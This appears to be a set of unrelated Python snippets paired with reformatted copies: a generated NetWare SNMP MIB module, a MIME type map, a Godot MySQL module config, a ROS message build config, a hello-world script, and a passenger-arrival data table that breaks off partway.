nwhr_printer_table = mib_table((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13))
if mibBuilder.loadTexts:
nwhrPrinterTable.setStatus('mandatory')
nwhr_printer_entry = mib_table_row((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1)).setIndexNames((0, 'NetWare-Host-Ext-MIB', 'nwhrPrinterID'))
if mibBuilder.loadTexts:
nwhrPrinterEntry.setStatus('mandatory')
nwhr_printer_id = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPrinterID.setStatus('mandatory')
nwhr_printer_type = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 2), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4))).clone(namedValues=named_values(('other', 1), ('local', 2), ('netware', 3), ('unixware', 4)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPrinterType.setStatus('mandatory')
nwhr_printer_local_name = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 3), international_display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPrinterLocalName.setStatus('mandatory')
nwhr_printer_queue_name = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 4), international_display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPrinterQueueName.setStatus('mandatory')
nwhr_printer_server_name = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 5), international_display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPrinterServerName.setStatus('mandatory')
nwhr_printer_transport_domain = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 6), transport_domain()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPrinterTransportDomain.setStatus('mandatory')
nwhr_printer_transport_address = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 7), transport_address()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPrinterTransportAddress.setStatus('mandatory')
nwhr_printer_device_index = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 8), integer32().subtype(subtypeSpec=value_range_constraint(0, 2147483647))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPrinterDeviceIndex.setStatus('mandatory')
nwhr_lsl_out_pkts = mib_scalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 1), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrLslOutPkts.setStatus('mandatory')
nwhr_lsl_in_pkts = mib_scalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 2), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrLslInPkts.setStatus('mandatory')
nwhr_lsl_unclaimed_pkts = mib_scalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 3), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrLslUnclaimedPkts.setStatus('mandatory')
nwhr_protocol_table = mib_table((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4))
if mibBuilder.loadTexts:
nwhrProtocolTable.setStatus('mandatory')
pysmi_fake_col1000 = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1) + (1000,), integer32())
nwhr_protocol_entry = mib_table_row((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1)).setIndexNames((0, 'NetWare-Host-Ext-MIB', 'pysmiFakeCol1000'), (0, 'NetWare-Host-Ext-MIB', 'nwhrProtocolName'))
if mibBuilder.loadTexts:
nwhrProtocolEntry.setStatus('mandatory')
nwhr_protocol_name = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 1), international_display_string().subtype(subtypeSpec=value_size_constraint(0, 20))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrProtocolName.setStatus('mandatory')
nwhr_protocol_id = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 2), octet_string().subtype(subtypeSpec=value_size_constraint(0, 6))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrProtocolID.setStatus('mandatory')
nwhr_protocol_address = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 3), international_display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrProtocolAddress.setStatus('mandatory')
nwhr_protocol_out_pkts = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 4), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrProtocolOutPkts.setStatus('mandatory')
nwhr_protocol_in_pkts = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 5), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrProtocolInPkts.setStatus('mandatory')
nwhr_protocol_ignored_pkts = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 6), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrProtocolIgnoredPkts.setStatus('mandatory')
nwhr_protocol_full_name = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 7), international_display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrProtocolFullName.setStatus('mandatory')
nwhr_if_table = mib_table((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5))
if mibBuilder.loadTexts:
nwhrIfTable.setStatus('mandatory')
pysmi_fake_col1001 = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5, 1) + (1001,), integer32())
nwhr_if_entry = mib_table_row((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5, 1)).setIndexNames((0, 'NetWare-Host-Ext-MIB', 'pysmiFakeCol1001'))
if mibBuilder.loadTexts:
nwhrIfEntry.setStatus('mandatory')
nwhr_if_logical_board_number = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrIfLogicalBoardNumber.setStatus('mandatory')
nwhr_if_frame_type = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5, 1, 2), international_display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrIfFrameType.setStatus('mandatory')
nwhr_if_logical_board_name = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5, 1, 3), international_display_string().subtype(subtypeSpec=value_size_constraint(0, 18))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrIfLogicalBoardName.setStatus('mandatory')
mibBuilder.exportSymbols('NetWare-Host-Ext-MIB', nwhrPrinterServerName=nwhrPrinterServerName, nwhrDiskStorageHeads=nwhrDiskStorageHeads, nwhrAdapterDMA1=nwhrAdapterDMA1, nwhrIfLogicalBoardName=nwhrIfLogicalBoardName, nwhrAdapterDevices=nwhrAdapterDevices, nwhrHotfixUnits=nwhrHotfixUnits, nwhrAdapterIndex=nwhrAdapterIndex, nwhrStorageMemoryPermanent=nwhrStorageMemoryPermanent, nwhrLslOutPkts=nwhrLslOutPkts, nwhrMslEntry=nwhrMslEntry, nwhrProtocolFullName=nwhrProtocolFullName, nwhrPrinterID=nwhrPrinterID, nwhrDiskStorageEntry=nwhrDiskStorageEntry, nwhrDiskStorageCylinders=nwhrDiskStorageCylinders, nwhrHotfixReserved=nwhrHotfixReserved, nwhrDeviceEntry=nwhrDeviceEntry, nwhrPhysicalPartitionType=nwhrPhysicalPartitionType, nwhrHotfixTotal=nwhrHotfixTotal, nwhrAdapterMem1=nwhrAdapterMem1, nwhrProcessorCount=nwhrProcessorCount, nwhrDiskStorageSectorsPerTrack=nwhrDiskStorageSectorsPerTrack, nwhrMslCount=nwhrMslCount, TransportAddress=TransportAddress, nwhrStorageCacheBuffers=nwhrStorageCacheBuffers, nwhrAdapterDriverMajorVer=nwhrAdapterDriverMajorVer, nwhrProtocolInPkts=nwhrProtocolInPkts, nwhrPhysicalPartitionTable=nwhrPhysicalPartitionTable, nwhrPrinterTable=nwhrPrinterTable, nwhrDeviceAdapterIndex=nwhrDeviceAdapterIndex, nwhrProtocolAddress=nwhrProtocolAddress, nwhrAdapterMem1Len=nwhrAdapterMem1Len, nwhrProtocolName=nwhrProtocolName, nwhrStorageCacheNonMovable=nwhrStorageCacheNonMovable, nwhrAdapterInterrupt1=nwhrAdapterInterrupt1, nwhrAdapterMem2Len=nwhrAdapterMem2Len, InternationalDisplayString=InternationalDisplayString, nwhrProtocolEntry=nwhrProtocolEntry, nwhrPhysicalPartitionSize=nwhrPhysicalPartitionSize, nwhrAdapterDriverDescr=nwhrAdapterDriverDescr, nwhrAdapterSlot=nwhrAdapterSlot, nwhrDeviceTable=nwhrDeviceTable, nwhrProtocolOutPkts=nwhrProtocolOutPkts, pysmiFakeCol1000=pysmiFakeCol1000, nwhrProtocolIgnoredPkts=nwhrProtocolIgnoredPkts, TransportDomain=TransportDomain, nwhrPhysicalPartitionEntry=nwhrPhysicalPartitionEntry, nwhrHotfixUsed=nwhrHotfixUsed, nwhrStorageCacheMovable=nwhrStorageCacheMovable, nwhrAdapterPort2Len=nwhrAdapterPort2Len, nwhrHotfixTable=nwhrHotfixTable, nwhrStorageDOSMemory=nwhrStorageDOSMemory, nwhrPrinterTransportDomain=nwhrPrinterTransportDomain, nwhrMslOutErrors=nwhrMslOutErrors, nwhrProtocolID=nwhrProtocolID, novell=novell, nwhrDiskStorageBlockSize=nwhrDiskStorageBlockSize, nwhrPhysicalPartitionIndex=nwhrPhysicalPartitionIndex, nwHostExtensions=nwHostExtensions, nwhrAdapterPort1Len=nwhrAdapterPort1Len, nwhrAdapterEntry=nwhrAdapterEntry, nwhrAdapterDriverMinorVer=nwhrAdapterDriverMinorVer, nwhrStorageTypes=nwhrStorageTypes, nwhrAdapterInterrupt2=nwhrAdapterInterrupt2, nwhrDiskStorageSectorSize=nwhrDiskStorageSectorSize, nwhrAdapterDMA2=nwhrAdapterDMA2, nwhrIfTable=nwhrIfTable, nwhrStorageUnclaimedMemory=nwhrStorageUnclaimedMemory, nwhrPrinterTransportAddress=nwhrPrinterTransportAddress, nwhrMslSends=nwhrMslSends, nwhrStorageVolume=nwhrStorageVolume, nwhrOdi=nwhrOdi, nwhrAdapterDescr=nwhrAdapterDescr, nwhrHotfixEntry=nwhrHotfixEntry, nwhrPrinterType=nwhrPrinterType, nwhrPhysicalPartitionDescr=nwhrPhysicalPartitionDescr, nwhrIfFrameType=nwhrIfFrameType, nwhrDeviceControllerNumber=nwhrDeviceControllerNumber, nwhrAdapterCount=nwhrAdapterCount, nwhrLslUnclaimedPkts=nwhrLslUnclaimedPkts, pysmiFakeCol1001=pysmiFakeCol1001, nwhrAdapterPort1=nwhrAdapterPort1, nwhrDeviceTypes=nwhrDeviceTypes, KBytes=KBytes, nwhrPrinterCount=nwhrPrinterCount, nwhrDeviceMirroredServerLink=nwhrDeviceMirroredServerLink, nwhrAdapterPort2=nwhrAdapterPort2, nwhrPrinterQueueName=nwhrPrinterQueueName, nwhrDevice=nwhrDevice, nwhrIfLogicalBoardNumber=nwhrIfLogicalBoardNumber, nwhrPrinterEntry=nwhrPrinterEntry, nwhrDeviceNumber=nwhrDeviceNumber, nwhrStorageIOEngineMemory=nwhrStorageIOEngineMemory, nwhrPrinterLocalName=nwhrPrinterLocalName, nwhrAdapterTable=nwhrAdapterTable, nwhrAdapterType=nwhrAdapterType, nwhrStorageCodeAndDataMemory=nwhrStorageCodeAndDataMemory, nwhrStorage=nwhrStorage, nwhrMslState=nwhrMslState, nwhrPrinterDeviceIndex=nwhrPrinterDeviceIndex, nwhrMslSpeed=nwhrMslSpeed, nwhrDiskStorageCount=nwhrDiskStorageCount, nwhrDiskStorageTable=nwhrDiskStorageTable, nwhrStorageMSEngineMemory=nwhrStorageMSEngineMemory, nwhrLslInPkts=nwhrLslInPkts, nwhrProtocolTable=nwhrProtocolTable, nwhrAdapterMem2=nwhrAdapterMem2, nwhrMslInErrors=nwhrMslInErrors, mibDoc=mibDoc, nwhrStorageMemoryAlloc=nwhrStorageMemoryAlloc, nwhrIfEntry=nwhrIfEntry, nwhrMslTable=nwhrMslTable, nwhrMslReceives=nwhrMslReceives) |
""" Mime type data
"""
MIME_TYPES = {
'png': "image/png",
'svg': "image/svg+xml",
'eps': "application/postscript",
'dw': "text/plain",
}
| """ Mime type data
"""
mime_types = {'png': 'image/png', 'svg': 'image/svg+xml', 'eps': 'application/postscript', 'dw': 'text/plain'} |
# config.py
def can_build(env, platform):
return True
def configure(env):
pass
def get_doc_path():
return "doc_classes"
def get_doc_classes():
return [
"MySQL",
]
| def can_build(env, platform):
return True
def configure(env):
pass
def get_doc_path():
return 'doc_classes'
def get_doc_classes():
return ['MySQL'] |
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/nvidia/catkin_ws/src/my_pkg3/msg/MABX.msg;/home/nvidia/catkin_ws/src/my_pkg3/msg/a.msg"
services_str = ""
pkg_name = "my_pkg3"
dependencies_str = "std_msgs"
langs = ""
dep_include_paths_str = "my_pkg3;/home/nvidia/catkin_ws/src/my_pkg3/msg;std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python"
package_has_static_sources = 'TRUE' == 'TRUE'
genmsg_check_deps_script = ""
| messages_str = '/home/nvidia/catkin_ws/src/my_pkg3/msg/MABX.msg;/home/nvidia/catkin_ws/src/my_pkg3/msg/a.msg'
services_str = ''
pkg_name = 'my_pkg3'
dependencies_str = 'std_msgs'
langs = ''
dep_include_paths_str = 'my_pkg3;/home/nvidia/catkin_ws/src/my_pkg3/msg;std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg'
python_executable = '/usr/bin/python'
package_has_static_sources = 'TRUE' == 'TRUE'
genmsg_check_deps_script = '' |
# greet.py| prints hello world to the console
message = 'Hello World'
print(message)
| message = 'Hello World'
print(message) |
"""
PASSENGERS
"""
numPassengers = 30585
passenger_arriving = (
(6, 7, 5, 12, 5, 4, 3, 0, 3, 0, 0, 1, 0, 12, 9, 9, 3, 5, 2, 3, 2, 3, 0, 1, 2, 0), # 0
(8, 12, 2, 2, 8, 3, 3, 1, 2, 2, 1, 0, 0, 14, 10, 7, 6, 5, 4, 4, 3, 6, 3, 2, 2, 0), # 1
(7, 11, 10, 8, 6, 2, 4, 4, 5, 1, 2, 1, 0, 10, 7, 6, 9, 7, 5, 3, 4, 4, 4, 0, 1, 0), # 2
(7, 6, 11, 15, 6, 4, 4, 5, 3, 2, 2, 2, 0, 10, 10, 5, 5, 12, 3, 7, 2, 2, 4, 0, 0, 0), # 3
(10, 13, 11, 9, 8, 6, 5, 2, 1, 2, 0, 0, 0, 9, 3, 2, 6, 8, 8, 5, 6, 4, 3, 4, 0, 0), # 4
(14, 10, 13, 8, 8, 5, 7, 4, 4, 1, 1, 2, 0, 9, 10, 7, 4, 10, 6, 2, 4, 3, 1, 1, 0, 0), # 5
(16, 7, 7, 8, 9, 7, 6, 1, 5, 1, 2, 1, 0, 8, 9, 7, 6, 4, 4, 4, 5, 5, 3, 1, 0, 0), # 6
(21, 23, 5, 12, 8, 6, 4, 5, 2, 1, 2, 1, 0, 10, 7, 3, 8, 10, 5, 10, 5, 4, 6, 2, 0, 0), # 7
(14, 16, 9, 13, 4, 5, 4, 5, 7, 2, 3, 0, 0, 18, 13, 8, 9, 10, 6, 2, 6, 3, 3, 2, 0, 0), # 8
(15, 18, 14, 13, 12, 7, 4, 6, 8, 1, 0, 0, 0, 16, 6, 13, 7, 3, 8, 4, 2, 8, 6, 1, 0, 0), # 9
(17, 15, 10, 12, 4, 2, 5, 5, 4, 6, 4, 2, 0, 13, 11, 6, 10, 11, 6, 9, 3, 6, 4, 4, 3, 0), # 10
(12, 13, 12, 15, 19, 6, 6, 7, 8, 2, 1, 0, 0, 23, 8, 10, 12, 12, 5, 5, 3, 3, 5, 0, 1, 0), # 11
(10, 19, 7, 10, 10, 5, 5, 7, 6, 3, 1, 0, 0, 14, 10, 11, 5, 16, 4, 7, 9, 3, 6, 2, 0, 0), # 12
(15, 11, 15, 7, 10, 4, 8, 5, 4, 2, 2, 1, 0, 11, 14, 8, 9, 8, 7, 7, 4, 7, 2, 1, 1, 0), # 13
(15, 8, 13, 18, 10, 6, 9, 6, 7, 2, 5, 1, 0, 10, 18, 9, 7, 11, 9, 7, 3, 7, 4, 2, 1, 0), # 14
(10, 19, 6, 14, 12, 8, 8, 13, 9, 3, 3, 3, 0, 12, 6, 9, 9, 10, 7, 10, 3, 6, 3, 0, 0, 0), # 15
(7, 22, 12, 12, 9, 4, 8, 0, 4, 5, 2, 2, 0, 18, 9, 17, 9, 14, 12, 5, 6, 8, 3, 3, 1, 0), # 16
(18, 5, 12, 15, 9, 2, 10, 4, 7, 2, 5, 0, 0, 15, 13, 14, 14, 16, 9, 12, 6, 2, 8, 1, 2, 0), # 17
(22, 15, 12, 16, 11, 10, 3, 4, 8, 5, 2, 2, 0, 11, 13, 13, 6, 16, 7, 10, 4, 2, 4, 2, 1, 0), # 18
(15, 12, 8, 15, 9, 5, 7, 4, 6, 3, 2, 0, 0, 17, 15, 14, 8, 8, 5, 6, 3, 5, 2, 1, 0, 0), # 19
(14, 14, 11, 15, 15, 9, 5, 8, 6, 3, 2, 1, 0, 12, 16, 10, 4, 18, 10, 7, 3, 4, 5, 3, 0, 0), # 20
(18, 23, 12, 17, 18, 5, 6, 4, 5, 4, 0, 1, 0, 18, 14, 5, 11, 10, 11, 8, 4, 3, 6, 6, 0, 0), # 21
(10, 15, 12, 19, 14, 4, 4, 6, 6, 4, 5, 4, 0, 19, 17, 7, 13, 11, 8, 4, 2, 5, 7, 3, 0, 0), # 22
(13, 19, 14, 19, 11, 5, 9, 7, 5, 2, 3, 0, 0, 15, 15, 6, 9, 11, 8, 3, 0, 5, 7, 2, 0, 0), # 23
(14, 9, 9, 11, 13, 4, 5, 5, 8, 1, 2, 3, 0, 15, 17, 9, 8, 15, 15, 7, 3, 4, 4, 1, 0, 0), # 24
(18, 18, 20, 8, 11, 11, 6, 7, 2, 4, 1, 1, 0, 16, 20, 13, 11, 21, 9, 7, 3, 8, 4, 1, 0, 0), # 25
(24, 14, 15, 12, 12, 6, 11, 5, 7, 3, 5, 0, 0, 16, 18, 8, 10, 15, 6, 4, 4, 7, 3, 3, 2, 0), # 26
(15, 14, 11, 15, 15, 6, 2, 5, 7, 4, 2, 1, 0, 17, 11, 17, 12, 12, 6, 7, 1, 3, 3, 3, 2, 0), # 27
(10, 15, 18, 17, 16, 5, 5, 5, 8, 3, 3, 1, 0, 17, 19, 11, 10, 8, 10, 15, 2, 3, 6, 4, 2, 0), # 28
(14, 9, 21, 13, 12, 10, 4, 10, 6, 3, 2, 2, 0, 21, 8, 10, 15, 11, 3, 8, 3, 5, 1, 5, 1, 0), # 29
(13, 14, 11, 25, 15, 4, 8, 4, 6, 2, 2, 0, 0, 12, 18, 13, 13, 12, 7, 8, 2, 7, 3, 3, 2, 0), # 30
(16, 18, 15, 15, 14, 6, 3, 5, 12, 2, 3, 1, 0, 15, 12, 11, 10, 12, 10, 4, 6, 5, 6, 0, 2, 0), # 31
(20, 19, 18, 13, 9, 5, 6, 7, 4, 2, 2, 0, 0, 30, 21, 14, 12, 11, 7, 5, 8, 6, 4, 0, 2, 0), # 32
(21, 18, 10, 10, 11, 6, 6, 1, 4, 4, 2, 1, 0, 25, 18, 8, 11, 9, 7, 3, 2, 3, 5, 2, 0, 0), # 33
(18, 16, 17, 18, 14, 7, 7, 8, 7, 4, 1, 0, 0, 16, 14, 16, 7, 9, 8, 11, 3, 7, 4, 2, 4, 0), # 34
(21, 12, 12, 17, 9, 7, 6, 2, 7, 7, 1, 2, 0, 17, 15, 7, 7, 17, 6, 7, 3, 7, 5, 2, 0, 0), # 35
(15, 10, 9, 11, 9, 4, 10, 5, 6, 1, 1, 2, 0, 7, 17, 14, 9, 9, 4, 6, 7, 7, 10, 4, 2, 0), # 36
(10, 21, 19, 19, 13, 4, 7, 6, 3, 2, 2, 2, 0, 19, 14, 6, 8, 11, 5, 8, 0, 4, 5, 4, 2, 0), # 37
(20, 16, 22, 11, 16, 9, 10, 6, 5, 7, 1, 1, 0, 17, 9, 10, 9, 13, 9, 9, 3, 5, 5, 3, 1, 0), # 38
(15, 13, 14, 17, 12, 6, 8, 7, 4, 2, 2, 1, 0, 17, 14, 16, 11, 15, 2, 6, 5, 8, 4, 4, 2, 0), # 39
(17, 10, 23, 16, 11, 3, 13, 3, 4, 1, 2, 4, 0, 16, 16, 8, 15, 16, 11, 6, 8, 2, 5, 4, 0, 0), # 40
(12, 10, 6, 10, 10, 8, 10, 7, 4, 5, 1, 1, 0, 15, 21, 8, 14, 16, 11, 7, 3, 8, 5, 4, 0, 0), # 41
(21, 14, 15, 20, 10, 9, 6, 4, 6, 6, 2, 1, 0, 11, 19, 9, 10, 17, 7, 8, 2, 5, 7, 3, 1, 0), # 42
(23, 14, 12, 7, 9, 7, 6, 5, 2, 4, 0, 1, 0, 23, 18, 12, 11, 16, 9, 6, 5, 4, 5, 2, 4, 0), # 43
(16, 15, 17, 12, 5, 6, 4, 2, 4, 2, 0, 3, 0, 21, 19, 11, 12, 16, 9, 5, 5, 4, 5, 1, 0, 0), # 44
(12, 14, 19, 14, 11, 4, 9, 5, 8, 7, 1, 1, 0, 19, 14, 12, 7, 15, 2, 4, 6, 9, 3, 3, 3, 0), # 45
(9, 14, 11, 12, 10, 3, 6, 6, 6, 1, 5, 1, 0, 15, 14, 12, 10, 13, 4, 9, 3, 9, 1, 0, 1, 0), # 46
(21, 13, 9, 14, 21, 5, 5, 3, 11, 2, 4, 4, 0, 12, 15, 14, 10, 17, 7, 10, 4, 5, 6, 0, 1, 0), # 47
(12, 16, 16, 15, 12, 8, 9, 7, 6, 3, 2, 3, 0, 10, 17, 11, 5, 11, 13, 4, 3, 4, 6, 4, 1, 0), # 48
(14, 18, 12, 18, 10, 6, 8, 2, 5, 2, 3, 3, 0, 17, 12, 6, 7, 23, 5, 3, 7, 6, 7, 3, 0, 0), # 49
(20, 18, 10, 14, 9, 2, 5, 6, 6, 3, 3, 2, 0, 22, 16, 5, 5, 13, 8, 4, 8, 7, 4, 1, 1, 0), # 50
(15, 13, 5, 15, 14, 4, 10, 8, 6, 4, 2, 0, 0, 18, 9, 12, 12, 12, 11, 6, 5, 4, 2, 3, 0, 0), # 51
(19, 16, 12, 17, 7, 6, 10, 4, 4, 5, 2, 1, 0, 13, 18, 11, 7, 17, 12, 7, 1, 7, 6, 2, 2, 0), # 52
(11, 17, 20, 9, 9, 7, 5, 2, 6, 1, 2, 1, 0, 15, 20, 16, 9, 11, 6, 7, 2, 5, 7, 1, 0, 0), # 53
(16, 13, 15, 16, 11, 7, 6, 7, 2, 3, 5, 1, 0, 13, 12, 7, 13, 11, 7, 6, 4, 1, 11, 1, 1, 0), # 54
(19, 21, 19, 17, 9, 7, 4, 6, 7, 0, 0, 3, 0, 17, 10, 11, 6, 19, 5, 6, 5, 7, 7, 1, 2, 0), # 55
(21, 14, 13, 17, 12, 5, 8, 9, 6, 1, 1, 1, 0, 20, 7, 7, 8, 12, 7, 9, 2, 8, 8, 3, 1, 0), # 56
(17, 14, 11, 17, 7, 3, 8, 3, 6, 2, 4, 0, 0, 20, 17, 10, 7, 6, 8, 7, 6, 6, 6, 2, 3, 0), # 57
(13, 16, 9, 7, 18, 7, 6, 9, 9, 3, 2, 2, 0, 17, 12, 15, 14, 7, 6, 6, 8, 5, 5, 3, 3, 0), # 58
(20, 14, 10, 17, 13, 7, 7, 4, 8, 5, 2, 1, 0, 20, 16, 7, 10, 12, 4, 6, 4, 6, 4, 4, 2, 0), # 59
(21, 12, 15, 13, 13, 9, 12, 6, 7, 3, 2, 2, 0, 14, 12, 12, 6, 13, 8, 2, 7, 8, 6, 1, 0, 0), # 60
(20, 14, 17, 13, 15, 5, 3, 7, 6, 4, 1, 2, 0, 9, 10, 13, 6, 10, 4, 9, 4, 9, 7, 3, 2, 0), # 61
(7, 18, 15, 12, 17, 6, 5, 4, 5, 4, 0, 0, 0, 12, 15, 13, 12, 19, 6, 5, 5, 9, 1, 1, 2, 0), # 62
(21, 14, 14, 17, 15, 5, 12, 4, 10, 2, 4, 0, 0, 16, 12, 6, 11, 14, 2, 8, 5, 9, 8, 6, 3, 0), # 63
(26, 17, 18, 20, 7, 8, 10, 5, 8, 2, 0, 2, 0, 20, 19, 6, 9, 9, 8, 4, 4, 6, 3, 3, 3, 0), # 64
(19, 14, 15, 21, 10, 8, 5, 2, 8, 4, 2, 1, 0, 15, 18, 13, 9, 11, 7, 8, 1, 3, 5, 1, 1, 0), # 65
(19, 16, 10, 15, 8, 4, 7, 6, 8, 3, 2, 1, 0, 30, 13, 8, 9, 10, 13, 4, 5, 4, 4, 6, 1, 0), # 66
(9, 9, 13, 21, 13, 11, 5, 3, 4, 1, 2, 2, 0, 13, 19, 14, 7, 13, 8, 4, 3, 8, 3, 2, 2, 0), # 67
(9, 15, 12, 23, 12, 2, 5, 12, 9, 4, 1, 1, 0, 14, 12, 9, 8, 12, 8, 3, 4, 0, 5, 3, 1, 0), # 68
(16, 14, 9, 13, 16, 6, 6, 4, 5, 6, 2, 1, 0, 10, 12, 6, 8, 4, 5, 4, 4, 5, 1, 0, 0, 0), # 69
(12, 22, 17, 7, 16, 7, 4, 3, 7, 2, 3, 1, 0, 13, 16, 14, 3, 12, 6, 5, 6, 4, 8, 3, 4, 0), # 70
(16, 11, 13, 15, 12, 3, 6, 5, 6, 4, 2, 0, 0, 13, 9, 5, 8, 12, 4, 5, 5, 7, 6, 2, 0, 0), # 71
(13, 13, 17, 15, 10, 4, 7, 3, 4, 0, 3, 0, 0, 15, 11, 7, 9, 9, 4, 5, 4, 7, 8, 2, 1, 0), # 72
(16, 17, 12, 20, 22, 6, 11, 4, 6, 5, 3, 0, 0, 19, 9, 8, 11, 16, 4, 8, 7, 5, 4, 3, 0, 0), # 73
(17, 6, 14, 11, 10, 10, 6, 6, 6, 1, 3, 2, 0, 21, 10, 13, 11, 11, 6, 6, 1, 7, 4, 2, 4, 0), # 74
(12, 10, 13, 21, 13, 6, 8, 8, 12, 2, 2, 0, 0, 15, 12, 5, 4, 14, 6, 5, 2, 8, 6, 2, 3, 0), # 75
(19, 12, 17, 16, 13, 7, 7, 10, 7, 4, 0, 1, 0, 12, 15, 8, 5, 16, 5, 2, 2, 8, 1, 0, 1, 0), # 76
(18, 10, 15, 12, 8, 3, 6, 2, 4, 2, 2, 1, 0, 20, 8, 12, 7, 10, 4, 6, 6, 9, 2, 2, 3, 0), # 77
(8, 8, 13, 16, 14, 4, 7, 3, 2, 2, 4, 0, 0, 13, 10, 11, 7, 19, 4, 10, 6, 6, 1, 4, 1, 0), # 78
(15, 13, 12, 11, 11, 3, 2, 4, 5, 7, 2, 1, 0, 12, 16, 3, 9, 15, 7, 4, 8, 11, 4, 6, 1, 0), # 79
(16, 15, 18, 16, 9, 2, 7, 4, 10, 7, 1, 0, 0, 16, 16, 12, 6, 18, 5, 3, 3, 6, 4, 4, 0, 0), # 80
(15, 16, 4, 19, 10, 5, 4, 4, 5, 4, 3, 3, 0, 21, 11, 12, 7, 8, 2, 5, 2, 2, 7, 2, 2, 0), # 81
(21, 11, 14, 15, 15, 8, 6, 5, 3, 3, 2, 2, 0, 19, 10, 6, 7, 8, 6, 1, 6, 3, 2, 6, 1, 0), # 82
(11, 16, 8, 14, 9, 5, 3, 4, 3, 2, 0, 1, 0, 17, 9, 13, 7, 12, 7, 5, 9, 8, 7, 3, 0, 0), # 83
(13, 20, 13, 13, 16, 3, 3, 5, 11, 4, 0, 4, 0, 25, 12, 10, 15, 16, 6, 4, 6, 4, 5, 2, 1, 0), # 84
(14, 8, 13, 12, 13, 4, 3, 2, 4, 2, 2, 1, 0, 12, 16, 12, 9, 19, 7, 7, 6, 7, 4, 1, 0, 0), # 85
(16, 18, 12, 20, 12, 5, 5, 1, 8, 1, 1, 1, 0, 19, 19, 9, 6, 11, 12, 4, 2, 8, 4, 2, 2, 0), # 86
(25, 19, 13, 16, 10, 4, 7, 2, 2, 1, 1, 0, 0, 26, 14, 10, 10, 14, 9, 3, 6, 8, 4, 1, 3, 0), # 87
(17, 12, 8, 16, 11, 6, 5, 6, 6, 4, 2, 0, 0, 13, 20, 12, 9, 11, 11, 10, 2, 8, 5, 1, 3, 0), # 88
(10, 10, 10, 15, 8, 10, 12, 4, 8, 3, 5, 0, 0, 18, 13, 14, 6, 12, 4, 13, 3, 6, 1, 4, 3, 0), # 89
(12, 9, 14, 11, 16, 8, 5, 3, 8, 0, 2, 1, 0, 9, 9, 13, 8, 12, 6, 3, 5, 5, 7, 0, 0, 0), # 90
(18, 11, 10, 13, 10, 3, 5, 4, 5, 1, 3, 1, 0, 24, 11, 13, 7, 10, 3, 5, 2, 5, 5, 3, 1, 0), # 91
(17, 16, 11, 17, 16, 8, 6, 2, 3, 4, 0, 2, 0, 21, 13, 16, 9, 14, 4, 4, 5, 4, 5, 2, 0, 0), # 92
(14, 14, 6, 16, 7, 8, 11, 9, 8, 2, 4, 0, 0, 17, 13, 10, 6, 13, 8, 5, 4, 5, 5, 3, 0, 0), # 93
(22, 8, 8, 12, 9, 3, 0, 0, 3, 2, 1, 2, 0, 15, 12, 3, 11, 9, 3, 7, 7, 8, 12, 3, 1, 0), # 94
